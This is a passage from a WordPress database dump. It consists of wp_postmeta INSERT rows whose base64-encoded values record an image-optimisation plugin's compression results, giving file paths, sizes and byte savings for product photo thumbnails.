JyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4MTUsImlkIjoxMzYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01MNC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjgxOCwiaWQiOjEzNjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUw0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODIxLCJpZCI6MTM2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01MNC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjgyMywiaWQiOjEzNjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4MjUsImlkIjoxMzYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUw0LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODI4LCJpZCI6MTM2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01MNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjgzMCwiaWQiOjEzNjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4MzMsImlkIjoxMzYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUw0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODM1LCJpZCI6MTM2MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29591, 1358, 'wpfc_optimisation_reduction', '54694'); 
INSERT INTO `wp_postmeta` VALUES (29592, 1358, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny5qcGciLCJ3aWR0aCI6MTQzMSwiaGVpZ2h0IjoxMDczLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTcuanBnIiwicmVkdWN0aW9uIjo1NDY4MSwidGltZSI6MTQ4MzU3Mjg0NiwiaWQiOiIxMzU4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4NTEsImlkIjoxMzU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTgwMHg2MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctODAweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTUZfMTY1Ny04MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjg1NCwiaWQiOjEzNTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctNzY4eDU3Ni5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny03Njh4NTc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01NRl8xNjU3LTc2OHg1NzYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODU2LCJpZCI6MTM1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4NTksImlkIjoxMzU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTUZfMTY1Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjg2MSwiaWQiOjEzNTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01NRl8xNjU3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODYzLCJpZCI6MTM1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4NjYsImlkIjoxMzU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01NRl8xNjU3LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODY4LCJpZCI6MTM1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTUZfMTY1Ny0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjg3MCwiaWQiOjEzNTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4NzIsImlkIjoxMzU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01NRl8xNjU3LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODc1LCJpZCI6MTM1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTU1GXzE2NTctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTUZfMTY1Ny0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjg3NywiaWQiOjEzNTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTUZfMTY1Ny00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01NRl8xNjU3LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTU1GXzE2NTctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4NzksImlkIjoxMzU4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29593, 1357, 'wpfc_optimisation_reduction', '13747'); 
INSERT INTO `wp_postmeta` VALUES (29594, 1357, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUuanBnIiwid2lkdGgiOjQ5OTIsImhlaWdodCI6MzMyOCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3Mjg4NCwiaWQiOiIxMzU3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU3Mjg4NywiaWQiOjEzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDgyLCJ0aW1lIjoxNDgzNTcyODkxLCJpZCI6MTM1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk1NiwidGltZSI6MTQ4MzU3Mjg5NSwiaWQiOjEzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmx1b3JvcG9seW1lci1jb2F0aW5nLUNhdGhldGVyLWd1aWRld2lyZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjYzNjIsInRpbWUiOjE0ODM1NzI4OTksImlkIjoxMzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZsdW9yb3BvbHltZXItY29hdGluZy1DYXRoZXRlci1ndWlkZXdpcmUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GbHVvcm9wb2x5bWVyLWNvYXRpbmctQ2F0aGV0ZXItZ3VpZGV3aXJlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG